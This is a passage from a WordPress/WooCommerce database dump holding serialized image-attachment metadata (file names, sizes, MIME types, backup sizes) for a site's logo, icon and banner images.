s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"final-logo-06-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"final-logo-06-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"final-logo-06-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:27:\"final-logo-06-1536x1536.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:27:\"final-logo-06-2048x2048.png\";s:5:\"width\";i:2048;s:6:\"height\";i:2048;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"final-logo-06-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"final-logo-06-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"final-logo-06-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:23:\"final-logo-06-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:23:\"final-logo-06-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2489,691,'_edit_lock','1643796809:1'),(2490,692,'_wp_attached_file','2022/02/cropped-final-logo-06.png'),(2491,692,'_wp_attachment_context','site-icon'),(2492,692,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:33:\"2022/02/cropped-final-logo-06.png\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"cropped-final-logo-06-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"cropped-final-logo-06-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"cropped-final-logo-06-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"cropped-final-logo-06-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:33:\"cropped-final-logo-06-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"cropped-final-logo-06-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:31:\"cropped-final-logo-06-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:31:\"cropped-final-logo-06-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-270\";a:4:{s:4:\"file\";s:33:\"cropped-final-logo-06-270x270.png\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-192\";a:4:{s:4:\"file\";s:33:\"cropped-final-logo-06-192x192.png\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-180\";a:4:{s:4:\"file\";s:33:\"cropped-final-logo-06-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"site_icon-32\";a:4:{s:4:\"file\";s:31:\"cropped-final-logo-06-32x32.png\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2493,693,'_wp_attached_file','2022/02/cropped-MITRA-06.png'),(2494,693,'_wp_attachment_context','site-icon'),(2495,693,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:28:\"2022/02/cropped-MITRA-06.png\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"cropped-MITRA-06-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"cropped-MITRA-06-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"cropped-MITRA-06-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"cropped-MITRA-06-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:28:\"cropped-MITRA-06-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"cropped-MITRA-06-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:26:\"cropped-MITRA-06-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:26:\"cropped-MITRA-06-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-270\";a:4:{s:4:\"file\";s:28:\"cropped-MITRA-06-270x270.png\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-192\";a:4:{s:4:\"file\";s:28:\"cropped-MITRA-06-192x192.png\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-180\";a:4:{s:4:\"file\";s:28:\"cropped-MITRA-06-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"site_icon-32\";a:4:{s:4:\"file\";s:26:\"cropped-MITRA-06-32x32.png\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2507,698,'_wp_attached_file','2022/02/banner-Recovered-01-1-1-e1643802945146.png'),(2508,698,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:50:\"2022/02/banner-Recovered-01-1-1-e1643802945146.png\";s:8:\"filesize\";i:244496;s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:50:\"banner-Recovered-01-1-1-e1643802945146-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:102395;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:50:\"banner-Recovered-01-1-1-e1643802945146-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:15442;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:48:\"banner-Recovered-01-1-1-e1643802945146-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2231;}s:6:\"medium\";a:4:{s:4:\"file\";s:50:\"banner-Recovered-01-1-1-e1643802945146-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"banner-Recovered-01-1-1-1024x479.png\";s:5:\"width\";i:1024;s:6:\"height\";i:479;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:50:\"banner-Recovered-01-1-1-e1643802945146-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:50:\"banner-Recovered-01-1-1-e1643802945146-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:36:\"banner-Recovered-01-1-1-1536x718.png\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:36:\"banner-Recovered-01-1-1-2048x957.png\";s:5:\"width\";i:2048;s:6:\"height\";i:957;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:50:\"banner-Recovered-01-1-1-e1643802945146-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:50:\"banner-Recovered-01-1-1-e1643802945146-600x280.png\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:50:\"banner-Recovered-01-1-1-e1643802945146-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:48:\"banner-Recovered-01-1-1-e1643802945146-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:48:\"banner-Recovered-01-1-1-e1643802945146-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2509,698,'_wp_attachment_backup_sizes','a:16:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:3834;s:6:\"height\";i:1792;s:4:\"file\";s:27:\"banner-Recovered-01-1-1.png\";}s:18:\"full-1643802945146\";a:3:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:42:\"banner-Recovered-01-1-1-e1643802924828.png\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:35:\"banner-Recovered-01-1-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:35:\"banner-Recovered-01-1-1-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"medium_large-orig\";a:4:{s:4:\"file\";s:35:\"banner-Recovered-01-1-1-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"large-orig\";a:4:{s:4:\"file\";s:36:\"banner-Recovered-01-1-1-1024x479.png\";s:5:\"width\";i:1024;s:6:\"height\";i:479;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"1536x1536-orig\";a:4:{s:4:\"file\";s:36:\"banner-Recovered-01-1-1-1536x718.png\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"2048x2048-orig\";a:4:{s:4:\"file\";s:36:\"banner-Recovered-01-1-1-2048x957.png\";s:5:\"width\";i:2048;s:6:\"height\";i:957;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"woocommerce_thumbnail-orig\";a:5:{s:4:\"file\";s:35:\"banner-Recovered-01-1-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:23:\"woocommerce_single-orig\";a:4:{s:4:\"file\";s:35:\"banner-Recovered-01-1-1-600x280.png\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:9:\"image/png\";}s:34:\"woocommerce_gallery_thumbnail-orig\";a:4:{s:4:\"file\";s:35:\"banner-Recovered-01-1-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"shop_catalog-orig\";a:4:{s:4:\"file\";s:35:\"banner-Recovered-01-1-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"shop_single-orig\";a:4:{s:4:\"file\";s:35:\"banner-Recovered-01-1-1-600x280.png\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"shop_thumbnail-orig\";a:4:{s:4:\"file\";s:35:\"banner-Recovered-01-1-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"thaps-thumb-img-orig\";a:4:{s:4:\"file\";s:33:\"banner-Recovered-01-1-1-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"taiowc-thumb-img-orig\";a:4:{s:4:\"file\";s:33:\"banner-Recovered-01-1-1-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}'),(2517,702,'_wp_attached_file','2022/02/banner-Recovered-04-e1643805322240.png'),(2518,702,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:46:\"2022/02/banner-Recovered-04-e1643805322240.png\";s:8:\"filesize\";i:368680;s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:46:\"banner-Recovered-04-e1643805322240-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:122056;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:46:\"banner-Recovered-04-e1643805322240-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18296;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:44:\"banner-Recovered-04-e1643805322240-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2746;}s:6:\"medium\";a:4:{s:4:\"file\";s:46:\"banner-Recovered-04-e1643805322240-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:47:\"banner-Recovered-04-e1643805252394-1024x479.png\";s:5:\"width\";i:1024;s:6:\"height\";i:479;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:46:\"banner-Recovered-04-e1643805322240-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:46:\"banner-Recovered-04-e1643805322240-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:47:\"banner-Recovered-04-e1643805252394-1536x718.png\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:47:\"banner-Recovered-04-e1643805252394-2048x957.png\";s:5:\"width\";i:2048;s:6:\"height\";i:957;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:46:\"banner-Recovered-04-e1643805322240-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:46:\"banner-Recovered-04-e1643805322240-600x280.png\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:46:\"banner-Recovered-04-e1643805322240-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:44:\"banner-Recovered-04-e1643805322240-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:44:\"banner-Recovered-04-e1643805322240-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2519,702,'_wp_attachment_backup_sizes','a:32:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:3834;s:6:\"height\";i:1792;s:4:\"file\";s:23:\"banner-Recovered-04.png\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-04-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-04-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"medium_large-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-04-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"large-orig\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-04-1024x479.png\";s:5:\"width\";i:1024;s:6:\"height\";i:479;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"1536x1536-orig\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-04-1536x718.png\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"2048x2048-orig\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-04-2048x957.png\";s:5:\"width\";i:2048;s:6:\"height\";i:957;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"woocommerce_thumbnail-orig\";a:5:{s:4:\"file\";s:31:\"banner-Recovered-04-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:23:\"woocommerce_single-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-04-600x280.png\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:9:\"image/png\";}s:34:\"woocommerce_gallery_thumbnail-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-04-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"shop_catalog-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-04-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"shop_single-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-04-600x280.png\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"shop_thumbnail-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-04-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"thaps-thumb-img-orig\";a:4:{s:4:\"file\";s:29:\"banner-Recovered-04-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"taiowc-thumb-img-orig\";a:4:{s:4:\"file\";s:29:\"banner-Recovered-04-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"full-1643805302181\";a:3:{s:5:\"width\";i:3834;s:6:\"height\";i:1792;s:4:\"file\";s:38:\"banner-Recovered-04-e1643805252394.png\";}s:18:\"full-1643805311847\";a:3:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:38:\"banner-Recovered-04-e1643805302181.png\";}s:18:\"full-1643805322240\";a:3:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:38:\"banner-Recovered-04-e1643805311847.png\";}s:23:\"thumbnail-1643805322240\";a:4:{s:4:\"file\";s:46:\"banner-Recovered-04-e1643805252394-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"medium-1643805322240\";a:4:{s:4:\"file\";s:46:\"banner-Recovered-04-e1643805252394-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"medium_large-1643805322240\";a:4:{s:4:\"file\";s:46:\"banner-Recovered-04-e1643805252394-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"large-1643805322240\";a:4:{s:4:\"file\";s:47:\"banner-Recovered-04-e1643805252394-1024x479.png\";s:5:\"width\";i:1024;s:6:\"height\";i:479;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"1536x1536-1643805322240\";a:4:{s:4:\"file\";s:47:\"banner-Recovered-04-e1643805252394-1536x718.png\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"2048x2048-1643805322240\";a:4:{s:4:\"file\";s:47:\"banner-Recovered-04-e1643805252394-2048x957.png\";s:5:\"width\";i:2048;s:6:\"height\";i:957;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"woocommerce_thumbnail-1643805322240\";a:4:{s:4:\"file\";s:46:\"banner-Recovered-04-e1643805252394-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"woocommerce_single-1643805322240\";a:4:{s:4:\"file\";s:46:\"banner-Recovered-04-e1643805252394-600x280.png\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:9:\"image/png\";}s:43:\"woocommerce_gallery_thumbnail-1643805322240\";a:4:{s:4:\"file\";s:46:\"banner-Recovered-04-e1643805252394-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"shop_catalog-1643805322240\";a:4:{s:4:\"file\";s:46:\"banner-Recovered-04-e1643805252394-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"shop_single-1643805322240\";a:4:{s:4:\"file\";s:46:\"banner-Recovered-04-e1643805252394-600x280.png\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"shop_thumbnail-1643805322240\";a:4:{s:4:\"file\";s:46:\"banner-Recovered-04-e1643805252394-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"thaps-thumb-img-1643805322240\";a:4:{s:4:\"file\";s:44:\"banner-Recovered-04-e1643805252394-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:30:\"taiowc-thumb-img-1643805322240\";a:4:{s:4:\"file\";s:44:\"banner-Recovered-04-e1643805252394-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}'),(2520,703,'_wp_attached_file','2022/02/banner-Recovered-03-e1643805423490.png'),(2521,703,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:46:\"2022/02/banner-Recovered-03-e1643805423490.png\";s:8:\"filesize\";i:329574;s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:46:\"banner-Recovered-03-e1643805423490-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:107923;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:46:\"banner-Recovered-03-e1643805423490-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:17477;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:44:\"banner-Recovered-03-e1643805423490-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2998;}s:6:\"medium\";a:4:{s:4:\"file\";s:46:\"banner-Recovered-03-e1643805423490-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-03-1024x479.png\";s:5:\"width\";i:1024;s:6:\"height\";i:479;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:46:\"banner-Recovered-03-e1643805423490-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:46:\"banner-Recovered-03-e1643805423490-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-03-1536x718.png\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4